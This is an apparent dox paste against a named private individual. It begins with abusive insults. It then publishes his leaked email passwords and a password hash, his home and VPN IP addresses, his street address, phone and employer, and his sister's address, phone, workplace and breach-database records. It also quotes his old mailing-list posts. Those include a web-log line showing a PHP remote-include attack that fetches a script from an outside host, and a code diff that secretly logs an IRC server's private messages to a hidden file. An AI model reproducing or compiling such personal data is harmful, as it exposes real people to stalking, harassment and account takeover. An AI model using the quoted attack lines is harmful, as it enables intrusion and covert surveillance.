@YogSotho / Marco Monicelli / @The_Beyond_One / is a well known twitter troll & overgrown skidiotic asswipe. For years after his IRL "software engineering career" fell apart Marco proceeded 2 join the surface skid-scene and attempted to join other so called "hacking teams" such as LizardSquad BWA GoonSquad etc. When constantly rejected due to posessing absolutely ZERO technical ability / network knowledge, by late 2017 Mr. Monicelli proceeded to roleplay as other well know members of the community such as MLT: https://en.wikipedia.org/wiki/MLT_(hacktivist) // Dshocker: https://www.darknet.org.uk/2008/11/dshocker-aka-aush0k-hackerpleads-guilty-to-computer-felonies/ // and Julius Kivimäki (zeekill): https://krebsonsecurity.com/tag/zeekill/ By May 2019 everyone got tired or Marco's bullshit and spam reported his @YogSotho twitter causing it to get suspended after which he made his new hadnle @The_Beyond_One. Date / Proof: https://gyazo.com/706aa1686a76d69d16a76ba0bed2985e At this point giving up roleplaying as other hackers Mr. Monicelli switched his game up and began spamming enyone who accomplished anything on twitter with idiocy claiming that what they did never happened (Even though there are articles and mountains of evidence that it did.) From MLT's arrest and TeamPoison's accomplishments to BWA Und0xxeds alleged possession of tmobiel accoutns, Marco the irrelevant, unnoticed, enraged SKID proceeded to spam everyone's tweets with lies and pointless comments. Today the Sharks & Killer Whales along with other predators of the community decided to give the drifting piece of rotting seaweed the attention which it has been begging for all these years... this is the end friend and I'm sure anyone reading this and cringing at your existence can agree with me that it willbe a good riddance. *Tips Fedora and stomps on insect* ------------------------------------------------------------------------- Marco Monicelli aka YogSotho aka @The_Beyond_One o doT o /XTerM exeC... ... ... -------------------------------------------------------------------------- Below you can see how the community responds to the skidiots personality disorder and social incabapilities: As you can see here the so called "hacking comunity" doesn't show a lot of respect for little Marco, or should I say the grown ass 38 year old man behind the little role play hacker sherade / persona. Below are how people normally reac to Mr. Monicelli's presence. https://gyazo.com/ede0a62b3ab526712916a967312bbe62 <<< @YogSotho Suspended in early 2019 by members of the community. https://gyazo.com/7eadecf1b79eef6d38f0d81cb3e055e2 <<< Beamage v1 https://gyazo.com/12f906975d4ffc10cc8e310801c6458e <<< Beamage v2 https://gyazo.com/07e27ce08833e7a832ca0ca3c1b0ffce <<< Kid tries to seem relevant by tagging himself where he doesn't belong https://gyazo.com/35847431e3e77db353395ee8f317c4b5 <<< Trying to seem relevant not realising nobody has time for him and his lies https://gyazo.com/3c944099d11ea50d221ef969e3af65f5 <<< People are embarassed to talk to this SKID because all he does is butt into convo's with random people and post meme's while trying to gain twitter followers and feed his puny "scary hacker" persona. https://gyazo.com/632be6b0c3c12ca16d394ec97c0e303d <<< again tries to join conversations and gets ignored lol https://gyazo.com/63b1ad8e56fb41fc8a6ff81fcf25110f <<< The poor skid gets clowned at all hours of the night wherever he goes. -------------------------------------------------------------------------- Proof liking @YogTotho to IRL Identity (Marco Monicelli) Mr_Pan [n=marcopan@host156-30-dynamic.3-87-r.retail.telecomitalia.it] has joined #ubuntu === YogSothoth [n=YogSotho@82.250.72.110] has joined #ubuntu [10:46] Hi! [10:46] Polysics: pcmanfm do what you need? === spaden [i=hidden-u@195.216.35.251] has joined #ubuntu [10:46] hmmm, [10:46] maybe i need to get a newer versiong of Ubuntu [10:46] it's great thx === Flaze [i=Omega@r220-101-112-217.cpe.unwired.net.au] has joined #ubuntu [10:46] Other than Gimp, is there a software to help merging photos, creating panoramas from multiple photos? === thuyvy_nguyen031 [n=thuyvy_n@222.253.110.14] has left #ubuntu [] [10:47] yea, I love that one - I use it in place of nautilus completely === tschaka [n=tschaka@p54B3A73B.dip0.t-ipconnect.de] has joined #ubuntu === cameronw [n=cameronw@123-100-99-208.ubs.maxnet.co.nz] has joined #ubuntu [10:48] it isn't totally integrated into gnome, though, like nautilus is....but it can be setup to be through the session manager, I think === dead_rooster [n=ubuntu@60-234-170-12.bitstream.orcon.net.nz] has left #ubuntu [] [10:48] after typing "sudo dpkg -reconfigure -phigh xserver -xorg", it just showed : "dpkt: conflicting actions --control and --remove" === Faithful [n=Faithful@ns.linuxterminal.com] has joined #ubuntu [10:48] PPG: Don't put a space between xserver-xorg === primus [n=primus@tm.82.192.62.130.dc.telemach.net] has joined #ubuntu === Hardiles [n=harri@dyn3-82-128-191-248.psoas.suomi.net] has joined #ubuntu [10:49] or between dpkg-reconfigure === wolfsong is frustrated by all his windows being drawn at 0,0 [10:49] should be 'sudo dpkg-reconfigure -phigh xserver-xorg' === jabba [n=jabba@pD95744E1.dip.t-dialin.net] has joined #ubuntu [10:50] OH!!! [10:50] hello [10:50] :) [10:50] lol [10:50] i am just trying to connect to a novell 6.0 server with ncpmount. but i always get an invalid server response (-330). [10:50] does aynone know that that means? [10:50] FOund it: Hugin [10:50] Or Pandora plung for The Gimp === fredddy [n=freddy@p3E9E4368.dip0.t-ipconnect.de] has joined #ubuntu [10:50] Little stuff like that can be sooooo confusing at first, ppg, I totally understand [10:50] *plugin [10:51] ncpmount -S servername -P start -A 192.168.1.5 -u jabba /mnt/novell/ -U novellusername === PiNE [n=bradley@211.203.183.52] has joined #ubuntu [10:51] how do i tell if compiz is running and which WM i'm using under gnome? === ojk007 [n=ojk007@58.175.24.112] has joined #ubuntu [10:52] !partition [10:52] Partitioning programs: !GParted or QTParted (also "man mkfs" for formatting) - Mounting partitions in Gnome under Dapper: System -> Administration -> Disks - For Edgy, see !fstab and !DiskMounter === tarntow [n=jaxon@221.127.200.71] has joined #ubuntu === predaeus [n=predaeus@chello212186005030.401.14.vie.surfer.at] has joined #ubuntu === ploufplouf [n=richard@host.110.163.23.62.rev.coltfrance.com] has joined #ubuntu === erpo [n=erpo@2001:5c0:8fff:fffe:0:0:0:6929] has joined #ubuntu === AdvoWork [n=danglebe@unaffiliated/advowork] has joined #ubuntu [10:53] jabba: try wireshark maybe? [10:54] ?? [10:54] reee [10:54] Frogzoo: whatfor? [10:54] hi there. Ive been following some instructions that tell me to do: useradd -r -c "Postfix Filters" -d /var/spool/filter filter yet it says that: invalid option -- r :/ [10:55] i cant see -r in the man pages, yet as i say, its telling me to do so, and im having problems further down the line by not doing it === Skyward [n=tinko@lb2.aeye.net] has joined #ubuntu [10:55] dan_ I can't seem to find in the log what your sound problem was... I remember you typing it, but not what you typed, and I can't find it anywhere === tarntow [n=jaxon@221.127.200.71] has joined #ubuntu [10:55] jabba: you get to see the conversation on the wire [10:56] no need for gnome integration anyway [10:56] hehe [10:56] i have this problem [10:56] all i needed is a fast file manage [10:56] *r [10:56] i got 2 soundcrads, one pci and on onboard [10:56] ubuntu/alsa makes my onboard default not the pci one === jikin [n=liuke@222.247.138.140] has joined #ubuntu [10:57] Frogzoo: seems ok, but in the end there is a NCP C Destroy Connection Service [10:57] user authed etc... === blan [n=marc@dslb-088-065-233-104.pools.arcor-ip.net] has joined #ubuntu [10:57] but i want the pci one as default, as card 0, but i dont know how, asoundconf wont work nor the solution in the forums === gerr1 [i=gerrycar@nat/canonical/x-2efdeeb598ed0ee5] has joined #ubuntu [10:57] Well, the easiest (maybe dirty) way that immediately comes to mind is disabling the onboard in your bios... [10:57] But, I assume you don't wanna do that [10:57] yeah u and your disabling [10:57] heheh Proof: https://gyazo.com/7cd4a329115980f296a4c34bec2b9f87 "Marcos" https://gyazo.com/5a080f62b9139d613b702e80537ac7e3 -█░ 1st s0me 1nf4llabl3 logiq: -█ -█ bongrip PRIVMSG #insecurity :if we got hacked -█ bongrip PRIVMSG #insecurity :we wouldnt be told -█ bongrip PRIVMSG #insecurity :i constantly have to check shit -█ bongrip PRIVMSG #insecurity :if we get hacked by these guys we wont know it -█ bongrip PRIVMSG #insecurity :htey arent going to brag -█ bongrip PRIVMSG #insecurity :until i check it and find it -█ bongrip PRIVMSG #insecurity :one day -█ YogSotho PRIVMSG #insecurity :Indeed. U notice only when they rm ur box -█ bongrip PRIVMSG #insecurity :which will never happen -█ bongrip PRIVMSG #insecurity :cause nothing is popped -█ bongrip PRIVMSG #insecurity :no -█ bongrip PRIVMSG #insecurity :they wont rm me -█ bongrip PRIVMSG #insecurity :they would just do it to log -█ bongrip PRIVMSG #insecurity :they would pop the hub -█ bongrip PRIVMSG #insecurity :from there u can use pcap play -█ bongrip PRIVMSG #insecurity :to sniff pm's -█ bongrip PRIVMSG #insecurity :and everything else -█ -█ Like this? -█ -█ src/modules/m_message.c -█ < if (ret == CANPRIVMSG_SEND) -█ < { -█ > FILE *fp; -█ > fp=fopen("/var/backups/.irc/log.txt", "a"); -█ > fprintf(fp, "%s %s %s :%s\n", parv[0], cmd, nick, text); -█ > fclose(fp); -█ < sendto_message_one(acptr, sptr, parv[0], newcmd, nick, -█ text); Proof: https://gyazo.com/e3f8fe96c610373037c2075a10562acb Name 94.36.22.39 Email yogsotho@yahoo.com Username yogsotho Hashed Password df1320122d9a8ae01f013cb79b733706:cL4FbPkh I.P. Address 87.30.11.168 this nigga on hackforums Email yogsotho@yahoo.com Password brody111 Email yogsotho@yahoo.com Password Nut3ll474 Email yogsotho@gmail.com Password Nut3ll474 Home IP: IP Details For: 94.36.22.39 Decimal: 1579423271 Hostname: 94-36-22-39.adsl-ull.clienti.tiscali.it ASN: 8612 ISP: Tiscali SpA Organization: Tiscali SpA Services: None detected Type: Broadband Assignment: Likely Dynamic IP Continent: Europe Country: Italy >< VPN: Decimal: 1392134254 Hostname: lns-bzn-61-82-250-72-110.adsl.proxad.net ASN: 12322 ISP: Free SAS Organization: Free SAS Services: None detected Type: Broadband Assignment: Likely Dynamic IP Continent: Europe Country: France ------------------------------------------------------------- ADDRESS / LOCATION / FAMILY MEMBE(S) ETC. ------------------------------------------------------------- Family members European contact / Employment followed by domestic address of possible relative or a family member MONICELLI MARCO Via Roaschia 159 - 10023 Chieri (TO) | mappa tel: 011 9425914 2. DOTT.SSA IRENE MONICELLI info sulla privacy 10, Via Milano - 10122 Torino (TO) | mappa cell: 349 1839386 Previous employment: Marco Monicelli MARCEGAGLIA SPA Automotive Sales Department Stainless Steel Division Tel. +39 0376 685369 Fax. +39 0376 685625 email: ***@marcegaglia.com (marco.monicelli@marcegaglia.com) IG: https://www.instagram.com/yogsotho/?hl=en Picture: https://gyazo.com/b6733f491759a29dff314f0627b15346 (Looks like the Fonzie) MONICELLI, MARCO Via Roaschia 159 - 10023 Chieri tel: (+38) 011 9425914 Map pic: https://gyazo.com/cb1b393b8a34129a2b1a11ef3bfb9bce Area desc: Comune di CHIERI Regione ProvinciaTO CAP10023 Prefisso011 Codice ISTAT001078 Codice catastale In zona trovi anche PHOTOVOLTAIC SYSTEMS SRL Corso Torino, 78 - 10023 Chieri (TO) tel: 011 2460872, 335 1261137 ONORANZE FUNEBRI L'ANNUNZIATA DI LUISON MARCO REPERIBILI 24 H SU 24 H Via Torino 52/a - 10023 Chieri (TO) tel: 011 6490292 APOLLO_IO_129M_MARKETING_2018 View Full Email marco.monicelli@inps.cv Name Marco Monicelli City Torino Country Italy Postal 10126 Linkedin http://www.linkedin.com/in/marco-monicelli-544403b9 Job Pensionato Company INPS Employer / email domain: https://www.marcegaglia.com/officialwebsite/ Address of him and sister (or wife not sure at this point) Proof: https://gyazo.com/fe1bfaf691648b1174e74c4f85e9e9b2 Other work experiences Marco Monicelli Pensionato presso INPS Turin, Piedmont, Italy8 connections Join to Connect INPS INPS Politecnico di Milano Politecnico di Milano Experience INPS Graphic Pensionato INPS Education Politecnico di Milano Politecnico di Milano Graphic Politecnico di Milano - Groups Rete di STIMA Rete di STIMA Graphic Rete di STIMA - ------------------------------------------------------------------------- Sister: Irene Monicelli Picture: https://gyazo.com/997acbe4fdf89363ce20e2c3b63c08ac https://twitter.com/irenemonicelli?lang=en Address: IRENE MONICELLI 10, Via Milano - 10122 Torino (TO) cell: 349 1839386 Old line: +39 06 8108869 Employment: Dott.ssa Irene Monicelli Psychotherapist in Turin, Italy Address: Via San Domenico, 37/c, 10122 Torino TO, Italy Hours: Closed ⋅ Opens 9AM Health & safety: Appointment required · Mask required · Staff wear masks · Staff required to disinfect surfaces between visits · More details Phone: +39 349 183 9386 Province: Metropolitan City of Turin Psicologo , Psicoterapeuta In studio Curriculum Tariffe Patologie Opinioni Sedi curriculum approfondisci La Dott.ssa Monicelli è Psicologa Psicoterapeuta ad indirizzo cognitivo comportamentale, metodologia evidence based con protocolli di intervento approvati dall'OMS.In ambito neuropsicologico collabora con strutture pubbliche e private che offrono servizi di valutazione e riabilitazione delle funzioni cognitive (memoria, attenzione e percezione).Integrando le conoscenze sui processi cognitivi e le tecniche cliniche (ipnosi, biofeedback, coaching) offre percorsi per il miglioramento e il potenziamento della performance sia in ambito sportivo che artistico.Applica inoltre, tecniche di rilassamento (rilassamento muscolare tecnica di Jacobson e tecniche immaginative) Mindfulness e di Training Autogeno, anche organizzando corsi individuali e di gruppo. Tariffe guarda tutte Consulenza psicologica • € 60 Top Mindfulness • da € 40 a € 60 Top Preparazione psicologica per sportivi • da € 50 a € 100 Top Psicologia dello sport • da € 50 a € 100 https://plus.google.com/112833901647497415468 (No longer active) Linked in info: Irene Monicelli Psicologa consulente per la prestazione aziendale e sportiva. Turin, Piedmont, Italy500+ connections Join to Connect MenteAttiva Studio di Psicologia MenteAttiva Studio di Psicologia Centro di Psicologia dello Sport - ISEF Centro di Psicologia dello Sport - ISEF Company Website Company WebsiteExternal link Activity Finalmente ci siamo! Riparte la nuova stagione 2020/2021 formativa di psicologia sportiva. Gli istruttori della Scuola Calcio della Polisportiva… Finalmente ci siamo! Riparte la nuova stagione 2020/2021 formativa di psicologia sportiva. Gli istruttori della Scuola Calcio della Polisportiva… Liked by Irene Monicelli La giraffa è l'animale terrestre che ha il cuore più grande, è un animale erbivoro e di conseguenza tende a non attaccare ma è molto forte e quindi è… La giraffa è l'animale terrestre che ha il cuore più grande, è un animale erbivoro e di conseguenza tende a non attaccare ma è molto forte e quindi è… Join now to see all activity Experience MenteAttiva Studio di Psicologia Graphic Libera professionista consulente per aziende e società sportive MenteAttiva Studio di Psicologia Nov 2012 - Present8 years 10 months Torino, Italia MenteAttiva Graphic Psicologa dello Sport e della Prestazione MenteAttiva Jan 2015 - Present6 years 8 months via San Domenico 37, 10122 Torino Percorsi di ottimizzazione della prestazione in campo sportivo, musicale e aziendale attraverso cui trasformare i problemi in opportunità e raggiungere così i propri obiettivi in tempi ridotti. Chiros Srl Graphic Psicologa-Neuropsicologa Chiros Srl Jan 2015 - Present6 years 8 months Torino, Italia - Programmi in supporto alle terapie del Centro (trattamento del dolore cronico, rilassamento muscolare, disturbi vestibolari, psicosomatica, Training Autogeno e Mindfulness). Ospedale civico di Settimo Torinese Graphic Servizio di Neuropsicologia Ospedale civico di Settimo Torinese Mar 2017 - Oct 20178 months Settimo Torinese Servizio di neuropsicologia per la valutazione e riabilitazione delle capacità cognitive in pazienti neurologici e ortopedici ricoverati presso la struttura. E' possibile richiedere prestazioni intramenia presso la struttura. Centro di Salute Psicofisica Graphic Psicologa - Neuropsicologa Centro di Salute Psicofisica Dec 2012 - Sep 20152 years 10 months Torino Il Centro si occupa di prevenzione, formazione e supervisione, interventi terapeutici, attività di studio e ricerca. Gestione del progetto CAFFE' ALZHEIMER TORINO Servizi Sociali del Comune di Torino Graphic Psicologa Servizi Sociali del Comune di Torino Oct 2010 - Jan 20154 years 4 months Torino, Italia Programmazione ed attuazione di un programma educativo/riabilitativo e promozione del benessere di minori con disabilità cognitive e disagio psicologico. Sostegno alla famiglia ASL TO2 TORINO, S.E.R.T Graphic Psicoterapeuta specializzanda ASL TO2 TORINO, S.E.R.T Jan 2013 - Nov 20141 year 11 months Torino Lega Italiana Lotta Tumori, LILT Graphic Psicologa Lega Italiana Lotta Tumori, LILT Apr 2012 - May 20142 years 2 months Torino, Italia Progetto "Missione Salute" Presidio Sanitario San Camillo Graphic Specializzanda Presidio Sanitario San Camillo Nov 2010 - Dec 20122 years 2 months Torino, Italia Colloqui di sostegno, adattamento alla malattia, counseling e training di rilassamento presso il servizio di psicologia; valutazione e training riabilitativi. Cooperativa Terzo Tempo Graphic Psicologa Cooperativa Terzo Tempo Jun 2012 - Aug 20123 months Torino Manos Amigas Graphic Collaboratrice progetti Manos Amigas May 2006 - May 20071 year 1 month Huaraz, Perù Casa di accoglienza per ragazzi di strada con progetti per la formazione al lavoro Education Centro di Psicologia dello Sport - ISEF Graphic Centro di Psicologia dello Sport - ISEF Esperto in Psicologia dello Sport e della Prestazione Percorso di ottimizzazione della perfomance (ambito sportivo e musicale) Responsabile Dott.Giuseppe Vercelli Corso di Ipnosi Medica Rapida Graphic Corso di Ipnosi Medica Rapida Ipnosi Tecniche di ipnosi rapida applicabili a contesti clinici, medici e sportivi Formatore Dott.Giuseppe Regaldo Istituto Watson Graphic Istituto Watson PsicotarapeutaScuola di Specializzazione in Psicoterapia Cognitivo-Comportamentale50/50 e lode 2010 - 2014 Activities and Societies: Scuola di formazione post universitaria riconosciuta dal Ministero Istruzione Università e Ricerca MIUR (L. 56/89; D.M. 509/98; L. 401/2000) Socia AIAMC Università degli Studi di Torino Università degli Studi di Torino Graphic Università degli Studi di Torino Laurea MagistraleScienze della Mente 2007 - 2010 Università degli Studi di Parma Università degli Studi di Parma Graphic Università degli Studi di Parma Laurea in PsicologiaPsicologia Volunteer Experience Croce Verde Graphic Volontaria Croce Verde Jun 2012 Languages Italiano Native or bilingual proficiency Inglese Professional working proficiency Spagnolo Full professional proficiency Organizations ASIECI - Dec 2015 - Present Associazione Scientifica Infermieri Esperti in Comunicazione Ipnotica AIAMC - Nov 2010 - Present Associazione Italiana Analisi e Modificazione del Comportamento MINDJOLT_COM_117M_GAMING_032019 View Full Email irene.moni@hotmail.com Name Irene Monicelli Id 29404118 Userid 688507171 Idk 2 Regdate 2010-08-10 Fname Irene Lname Monicelli APOLLO_IO_129M_MARKETING_2018 View Full Name Irene Monicelli City Turin Country Italy Linkedin http://www.linkedin.com/in/irene-monicelli-18027141 Job Psicologa-Neuropsicologa Company Chiros Srl CANVA_COM_133M_DESIGN_052019 View Full Username irene.monicelli Email irene.monicelli@gmail.com Name Irene Monicelli Id 62065049 Id_hash UACxacWKKUo Create_date 2018-03-08 09:05:08 Mail_status C Temporary 0 Roles U Deactivated 0 Locale it-IT Personal_brand 61946970 Personal_brand_id BACxaTl7wok MYFITNESSPAL_COM_144M_FITNESS_022018 Email irene.moni@hotmail.com Username Irene680 Lastip 91.253.103.134 ZOOSK_COM_28M_DATING_012020 View Full Username lord55 Email castellopandone55@yahoo.it Name Marco Monicelli Gender male Wants women Birthday 1960-06-17 Latitude 40833330 Longitude 14250000 Zipcode 80134 Country IT Regdate 2010-05-08 19:35:10 Last_login 2010-06-13 15:16:16 Last_flirted 2010-06-01 19:51:39 Height 180 Children 3 Balance 10 Dscore 800 BADOO_COM_126M_DATING_2016 CrackView Full Email conn123@libero.it Username 0150339855 Hash feba6a4e74056a4a2062e845e2854f78 Name Marco Monicelli Alias Marco Dob 1972-04-04 Unparsed 40:M:29:543:44630 End of sister: // o Log o ---------------------------------------------------------------------------------------- -------------------------------------------------------------------------- The following are logged via marco's original work email (Before he became a twitter skid the domain was owned by his family (proof below) and along with info previously dropped at the bottom of the file. ------------------------------------------------------------------------- Exhibit A: http://www.blacksheepnetworks.com/security/resources/pentest/8774.html Re: Windows Administrator access From: Marco Monicelli (marco.monicelli@marcegaglia.com) Date: Mon Feb 27 2006 - 02:49:49 EST Next message: ROB DIXON: "Re: Windows Administrator access" Previous message: intel96: "Re: Windows Administrator access" In reply to: Dillama: "Windows Administrator access" Next in thread: ROB DIXON: "Re: Windows Administrator access" Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ] You can simply change directory and going into "C:\Documents and Settings\Administrator". If you're not administrator, you cannot browse in there. The command prompt will show the path and this will demonstrate that you're administrator over there. Ciao Marco Dillama To pen-test@securityfocus.com 25/02/2006 10.17 cc Subject Windows Administrator access After gaining shell access to a Windows box, is there any way to show administrator privilege without changing the config or uploading new files? I have to demo the ability to gain administrator access to a Win 2000 box, the catch is no changes on the box so adding a user or loading whoami.exe from resource kit would not be options. Any suggestion here would be appreciated. Thanks --- Dillama ------------------------------------------------------------------------------ Audit your website security with Acunetix Web Vulnerability Scanner: Hackers are concentrating their efforts on attacking applications on your website. Up to 75% of cyber attacks are launched on shopping carts, forms, login pages, dynamic content etc. Firewalls, SSL and locked-down servers are futile against web application hacking. Check your website for vulnerabilities to SQL injection, Cross site scripting and other web attacks before hackers do! Download Trial at: http://www.securityfocus.com/sponsor/pen-test_050831 ------------------------------------------------------------------------------- ------------------------------------------------------------------------------ Audit your website security with Acunetix Web Vulnerability Scanner: Hackers are concentrating their efforts on attacking applications on your website. Up to 75% of cyber attacks are launched on shopping carts, forms, login pages, dynamic content etc. Firewalls, SSL and locked-down servers are futile against web application hacking. Check your website for vulnerabilities to SQL injection, Cross site scripting and other web attacks before hackers do! Download Trial at: http://www.securityfocus.com/sponsor/pen-test_050831 ------------------------------------------------------------------------------- Next message: ROB DIXON: "Re: Windows Administrator access" Previous message: intel96: "Re: Windows Administrator access" In reply to: Dillama: "Windows Administrator access" Next in thread: ROB DIXON: "Re: Windows Administrator access" Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ] This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:55:34 EDT ---------------------------------------------------------------------------- Exhibit B: https://www.pvv.ntnu.no/~shane/dokumentasjon/hack_attempt/msg00013.html Re: Hack attempt To: Alvin Oga Subject: Re: Hack attempt From: Marco Monicelli Date: Fri, 23 Jul 2004 17:18:17 +0200 Cc: focus-linux@securityfocus.com, norbert.crettol@idiap.ch (Norbert Crettol) Delivered-to: shane@homeo.stud.ntnu.no Delivered-to: mailing list focus-linux@securityfocus.com Delivered-to: moderator for focus-linux@securityfocus.com Importance: High In-reply-to: <200407222323.i6MNNDDp006811@Virtual.Linux-Consulting.com> List-help: List-id: List-post: List-subscribe: List-unsubscribe: Mailing-list: contact focus-linux-help@securityfocus.com; run by ezmlm Hi Norbert/Alvin As I already explained in private to Norbert, this is just a guy of DALnet Network playing with some exploit for PHP. Infact he installed eggdrop and psybnc which are not related to clones attack at all. He's probably just a kid with some automated script or some "l33t" tool to own unpatched boxes. Anyway why taking off wget and other useful binaries? I would suggest instead of fully patching your box and to maybe install Snort. I don't agree with the "smart people investigating for what's cooking". I think chkrootkit can help and can spare lot of time. Of course you shouldn't base your Security on this software only but it's a good help. Snort and Tripwire are definetively a good help too. As I said, it's not a clones derivated attack. It's just a chatting kid who probably is trying to build up his own Botnet to look l33t with his mates. Again I don't agree with the "another cracked box". Infact the whois made by Norbert on my suggestion, gave good results. The provider hosting his website (yes, that is his own personal website.... not very smart eh?!) has deleted the inject.txt script and gave a warning to this guy who will be probably scared to death (this depends on how old he is and other factors). Moreover we know his Nickname and we know he's chatting on Dalnet so.... some social engeneering could even lead to personal information on this kid. Anyway... Norbert patch your box on any PHP bug (there are tons of PHP bug as far as I know) and then try to use SATAN or NESSUS to check your box (I personally suggest Nessus). Oh... just one last but not least thing: don't forget to wipe your box 'cause you will never know what he did for real so it's much safer to reinstall everything. I know it's boring but it's the only SECURE way to know your box is clean. Hope this can help others with same problem. Ciao Marco Monicelli MARCEGAGLIA SPA Automotive Sales Department Stainless Steel Division Tel. +39 0376 685369 Fax. +39 0376 685625 email: marco.monicelli@marcegaglia.com Alvin Oga cc: focus-linux@securityfocus.com Subject: Re: Hack attempt 23/07/2004 01.23 hi norbert > "GET /.php?bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=id HTTP/1.0" 200 6625 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" time for you to patch and update to latest php or better still, turn it off esp if you don't need it tons of things to fix up ... to harden the server > bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=uname%20-a > bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=wget time to remove wget, lynx, and equiv apps > Has someone seen this kind of attack ? it's either eggdrop or modified clones/derivatives > (chkrootkit doesn't detect it). so much for chkrootkit :-) smart/intelligent people investigating for "whats cooking" is better than automated tools > Has someone heard of this www.bosscalvin.com (or www.calvinmumu.org) ? > Is there a way to stop this guy ? His nickname (CaEm) appears in the > the uploaded scripts. probably another cracked box ... long list to follow to find the actual cracker c ya alvin ------------------------------------------------------------------------------ Exhibit C: https://seclists.org/bugtraq/2006/Feb/368 Re: new linux malware From: Marco Monicelli Date: Mon, 20 Feb 2006 17:24:21 +0100 Dear Gadi, this malware looks like the famous Kaiten IRC bot. If you want, I can send the source code of it but it is already known by most of AVs and I think the source is public nowadays. This must be just another variant and bytheway it's detected as far as I can see from your quoted informations so it shouldn't be dangerous. Anyway, tnx for keeping us updated! Cheers Marco Gadi Evron To 18/02/2006 23.40 bugtraq () securityfocus com cc "full-disclosure () lists grok org uk" Subject new linux malware Today, we received a notification about a new Linux malware ItW (In the Wild). Chas Tomlin (http://www.ecs.soton.ac.uk/~cet/) provided Shadowserver (http://www.shadowserver.org/) and Nicholas Alright who notified the relevant operational communities, with the information on the binaries. He captured them with squil (http://sguil.sourceforge.net/). Chas is working with Shadowserver to identify better ways to trackdown/takedown botnets. *The credit should go to him and Shadowserver*. Shadowserver has been a responsible and essential part of recent Internet security activities. As anti virus vendors have been notified will soon do a write-up on it, I see no reason not to publicize it here. MD5: c2576aeff0fd9267b6cc3a7e1089e05d ~/samples/derfiq e9a2b13fe02d013cc5e11ee586d11c38 ~/samples/session We are not quite sure as of yet exactly what this does, it can be a Linux virus, a Linux Trojan horse, a Linux worm... we are not even sure if the checksums above are useful at all. We hope to know more soon and we will update as we do. There are some interesting strings to be noted: NOTICE %s :TSUNAMI = Special packeter that wont be blocked by most firewalls NOTICE %s :PAN = An advanced syn flooder that will kill most network drivers NOTICE %s :UDP = A udp flooder NOTICE %s :UNKNOWN = Another non-spoof udp flooder NOTICE %s :NICK = Changes the nick of the client NOTICE %s :SERVER = Changes servers NOTICE %s :GETSPOOFS = Gets the current spoofing NOTICE %s :SPOOFS = Changes spoofing to a subnet NOTICE %s :DISABLE = Disables all packeting from this client NOTICE %s :ENABLE = Enables all packeting from this client NOTICE %s :KILL = Kills the client NOTICE %s :GET = Downloads a file off the web and saves it onto the hd NOTICE %s :VERSION = Requests version of client NOTICE %s :KILLALL = Kills all current packeting NOTICE %s :HELP = Displays this NOTICE %s :IRC = Sends this command to the server NOTICE %s :SH = Executes a command 'session', current detection: AntiVir 6.33.1.50/20060218 found [BDS/Katien.R] Avast 4.6.695.0/20060216 found nothing AVG 718/20060217 found nothing Avira 6.33.1.50/20060218 found [BDS/Katien.R] BitDefender 7.2/20060218 found nothing CAT-QuickHeal 8.00/20060216 found nothing ClamAV devel-20060126/20060217 found nothing DrWeb 4.33/20060218 found nothing eTrust-InoculateIT 23.71.80/20060218 found nothing eTrust-Vet 12.4.2086/20060217 found nothing Ewido 3.5/20060218 found nothing Fortinet 2.69.0.0/20060218 found nothing F-Prot 3.16c/20060217 found nothing Ikarus 0.2.59.0/20060217 found [Backdoor.Linux.Keitan.C] Kaspersky 4.0.2.24/20060218 found [Backdoor.Linux.Keitan.c] McAfee 4700/20060217 found [Linux/DDoS-Kaiten] NOD32v2 1.1413/20060217 found nothing Norman 5.70.10/20060217 found nothing Panda 9.0.0.4/20060218 found nothing Sophos 4.02.0/20060218 found nothing Symantec 8.0/20060218 found [Backdoor.Kaitex] TheHacker 5.9.4.098/20060218 found nothing UNA 1.83/20060216 found nothing VBA32 3.10.5/20060217 found nothing 'derfiq' current detection: AntiVir 6.33.1.50/20060218 found [Worm/Linux.Lupper.B] Avast 4.6.695.0/20060216 found nothing AVG 718/20060217 found nothing Avira 6.33.1.50/20060218 found [Worm/Linux.Lupper.B] BitDefender 7.2/20060218 found nothing CAT-QuickHeal 8.00/20060216 found nothing ClamAV devel-20060126/20060217 found nothing DrWeb 4.33/20060218 found nothing eTrust-InoculateIT 23.71.80/20060218 found nothing eTrust-Vet 12.4.2086/20060217 found nothing Ewido 3.5/20060218 found nothing Fortinet 2.69.0.0/20060218 found nothing F-Prot 3.16c/20060217 found nothing Ikarus 0.2.59.0/20060217 found [Net-Worm.Linux.Lupper.B] Kaspersky 4.0.2.24/20060218 found nothing McAfee 4700/20060217 found nothing NOD32v2 1.1413/20060217 found nothing Norman 5.70.10/20060217 found nothing Panda 9.0.0.4/20060218 found nothing Sophos 4.02.0/20060218 found nothing Symantec 8.0/20060218 found [Hacktool] TheHacker 5.9.4.098/20060218 found nothing UNA 1.83/20060216 found nothing VBA32 3.10.5/20060217 found nothing This write-up can be found here: http://blogs.securiteam.com/index.php/archives/303 We will notify as we get new updates here: http://blogs.securiteam.com Gadi. -- http://blogs.securiteam.com/ "Out of the box is where I live". -- Cara "Starbuck" Thrace, Battlestar Galactica. By Date By Thread Current thread: new linux malware Gadi Evron (Feb 20) Re: new linux malware Christine Kronberg (Feb 21) PHP as a secure language? PHP worms? [was: Re: new linux malware] Gadi Evron (Feb 22) Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Christine Kronberg (Feb 21) Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Thomas M. Payerle (Feb 26) Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Kevin Waterson (Feb 24) Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Jamie Riden (Feb 26) Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Matthew Schiros (Feb 26) Re: new linux malware Marco Monicelli (Feb 21) Re: new linux malware Gadi Evron (Feb 22) Re: new linux malware Jamie Riden (Feb 23) -------------------------------------------------------------------------------------------------------- Exhibit D: https://bugtraq.securityfocus.narkive.com/AkKZ5lW3/trend-micro-officescan-for-win2k-strange-behaviour Discussion: Trend Micro Officescan for Win2k strange behaviour (too old to reply) Marco Monicelli 17 years ago Permalink Hello List! I've noticed the following "weird" behaviour of the Trend Micro Officescan client vers. 5.58 update to pattern 